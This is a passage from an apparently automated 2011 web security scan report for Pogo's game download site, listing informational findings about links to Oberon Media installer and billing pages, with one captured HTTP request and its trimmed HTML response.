http://gamecenter.cdn3.oberon-media.com/pogo/exe/amazing_adventures_around_world-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=amazing_adventures_around_world-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/amazing_finds-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=amazing_finds-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/amazing_heists_dillinger-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=amazing_heists_dillinger-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/amazing_pyramids-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=amazing_pyramids-setup.exe
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110088530&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=112761873&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=112950530&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=113784590&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=113803423&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115084950&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115465610&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115622760&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115648150&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115757720&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=116758743&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117013190&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117109933&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11736937&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117802570&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117821993&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117874650&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117891877&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117910257&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117980600&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118155197&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118435527&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118597527&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119181233&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119196280&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=

Request

GET /AllGames.aspx?SortBy=gameName&sDir=ASC&Page=1 HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 62526
Cache-Control: private, max-age=5250
Date: Sun, 09 Jan 2011 02:09:15 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<meta name="description" content="Try all downloadable games at Pogo for free including Picktureka! Museum Mayhem,
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/agatha_christie_3-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=agatha_christie_3-setup.exe" target="_self" onclick="omnitureLogDownload('117802570','oberonpogostd','Agatha Christie 3','Hidden Object','1/8/2011 6:36:15 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117802570&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Age_of_Emerald-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=Age_of_Emerald-setup.exe" target="_self" onclick="omnitureLogDownload('113784590','oberonpogostd','Age of Emerald','arcade','1/8/2011 6:36:15 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=113784590&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/age_of_japan_2_06521214-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=age_of_japan_2_06521214-setup.exe" target="_self" onclick="omnitureLogDownload('119196280','oberonpogostd','Age Of Japan 2','puzzle','1/8/2011 6:36:15 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119196280&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/age_of_oracles-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=age_of_oracles-setup.exe" target="_self" onclick="omnitureLogDownload('117821993','oberonpogostd','Age of Oracles','puzzle','1/8/2011 6:36:15 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117821993&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Airport_Mania_First_Flight-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=Airport_Mania_First_Flight-setup.exe" target="_self" onclick="omnitureLogDownload('115084950','oberonpogostd','Airport Mania First Flight','arcade','1/8/2011 6:36:15 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115084950&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/alabama_smith_escape_from_pompeii-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=alabama_smith_escape_from_pompeii-setup.exe" target="_self" onclick="omnitureLogDownload('115757720','oberonpogostd','Alabama Smith: Escape from Pom','puzzle','1/8/2011 6:36:15 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115757720&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/alabama_smith_2-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=alabama_smith_2-setup.exe" target="_self" onclick="omnitureLogDownload('117874650','oberonpogostd','Alabama Smith 2','Hidden Object','1/8/2011 6:36:16 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117874650&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/alchemists_apprentice-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=alchemists_apprentice-setup.exe" target="_self" onclick="omnitureLogDownload('117109933','oberonpogostd','Alchemists Apprentice','puzzle','1/8/2011 6:36:16 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117109933&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/alexandra_fortune-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=alexandra_fortune-setup.exe" target="_self" onclick="omnitureLogDownload('117891877','oberonpogostd','Alexandra Fortune','Hidden Object','1/8/2011 6:36:16 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117891877&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Alice_Greenfingers-setup.exe?RefId=&origin=ponline_dl_img&genre=Time Management&ln=en&ext=Alice_Greenfingers-setup.exe" target="_self" onclick="omnitureLogDownload('112950530','oberonpogostd','Alice Greenfingers','Time Management','1/8/2011 6:36:16 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=112950530&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/alice_greenfingers_2-setup.exe?RefId=&origin=ponline_dl_img&genre=Time Management&ln=en&ext=alice_greenfingers_2-setup.exe" target="_self" onclick="omnitureLogDownload('115622760','oberonpogostd','Alice Greenfingers 2','Time Management','1/8/2011 6:36:16 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115622760&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/alice_greenfingers_bundle_89125541-setup.exe?RefId=&origin=ponline_dl_img&genre=Bundles&ln=en&ext=alice_greenfingers_bundle_89125541-setup.exe" target="_self" onclick="omnitureLogDownload('118597527','oberonpogostd','Alice Greenfingers Bundle ........','Bundles','1/8/2011 6:36:16 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118597527&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/alice_in_wonderland_90834737-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=alice_in_wonderland_90834737-setup.exe" target="_self" onclick="omnitureLogDownload('119181233','oberonpogostd','Alice In Wonderland','Hidden Object','1/8/2011 6:36:16 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119181233&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/alices_tea_cup_madness_69514478-setup.exe?RefId=&origin=ponline_dl_img&genre=Time Management&ln=en&ext=alices_tea_cup_madness_69514478-setup.exe" target="_self" onclick="omnitureLogDownload('118435527','oberonpogostd','Alices Tea Cup Madness','Time Management','1/8/2011 6:36:16 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118435527&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/alices_magical_mahjong-setup.exe?RefId=&origin=ponline_dl_img&genre=Cards&ln=en&ext=alices_magical_mahjong-setup.exe" target="_self" onclick="omnitureLogDownload('116758743','oberonpogostd','Alices Magical Mahjong','cards','1/8/2011 6:36:16 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=116758743&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Alien_Shooter-setup.exe?RefId=&origin=ponline_dl_img&genre=Strategy&ln=en&ext=Alien_Shooter-setup.exe" target="_self" onclick="omnitureLogDownload('110088530','oberonpogostd','Alien_shooter','Strategy','1/8/2011 6:36:16 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110088530&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/alt_shift-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=alt_shift-setup.exe" target="_self" onclick="omnitureLogDownload('118155197','oberonpogostd','Alt Shift','arcade','1/8/2011 6:36:17 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118155197&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/amazing_adventures_around_world-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=amazing_adventures_around_world-setup.exe" target="_self" onclick="omnitureLogDownload('115465610','oberonpogostd','Amazing Adventures Around Worl','Hidden Object','1/8/2011 6:36:17 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115465610&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/amazing_adventured_bundle-setup.exe?RefId=&origin=ponline_dl_img&genre=Bundles&ln=en&ext=amazing_adventured_bundle-setup.exe" target="_self" onclick="omnitureLogDownload('117013190','oberonpogostd','Amazing Adventures SE Bundle','Bundles','1/8/2011 6:36:17 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117013190&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/amazing_adventures_3-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=amazing_adventures_3-setup.exe" target="_self" onclick="omnitureLogDownload('117980600','oberonpogostd','Amazing Adventures 3','Hidden Object','1/8/2011 6:36:17 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117980600&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Amazing_Adventures_The_Lost_Tomb-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=Amazing_Adventures_The_Lost_Tomb-setup.exe" target="_self" onclick="omnitureLogDownload('113803423','oberonpogostd','Amazing Adventures The Lost To','Hidden Object','1/8/2011 6:36:17 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=113803423&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/amazing_finds-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=amazing_finds-setup.exe" target="_self" onclick="omnitureLogDownload('115648150','oberonpogostd','Amazing Finds','arcade','1/8/2011 6:36:17 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115648150&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/amazing_heists_dillinger-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=amazing_heists_dillinger-setup.exe" target="_self" onclick="omnitureLogDownload('11736937','oberonpogostd','Amazing Heists Dillinger','Hidden Object','1/8/2011 6:36:17 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11736937&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/amazing_pyramids-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=amazing_pyramids-setup.exe" target="_self" onclick="omnitureLogDownload('117910257','oberonpogostd','Amazing Pyramids','puzzle','1/8/2011 6:36:18 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117910257&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Amazonia-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=Amazonia-setup.exe" target="_self" onclick="omnitureLogDownload('112761873','oberonpogostd','Amazonia','puzzle','1/8/2011 6:36:18 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=112761873&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...

16.19. http://download-games.pogo.com/Category.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/Category.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://download-games.pogo.com/Category.aspx?code=1002&genre=New&RefID=headernav_fp_shopmenu&Session=&orign=p_leftbar_catName&ln=en&=0

The response contains the following links to other domains:

http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/chainz_galaxy_68453211-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=chainz_galaxy_68453211-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/chainz_galaxy_68453211-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=New&ln=en&ext=chainz_galaxy_68453211-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/frutti_for_newbies_2_56454201-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=frutti_for_newbies_2_56454201-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_bundle_68450411-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=jewel_quest_mysteries_bundle_68450411-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/kaptain_brawe_53056849-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=kaptain_brawe_53056849-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_of_the_dragon_prince_84542444-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=mystery_of_the_dragon_prince_84542444-setup.exe
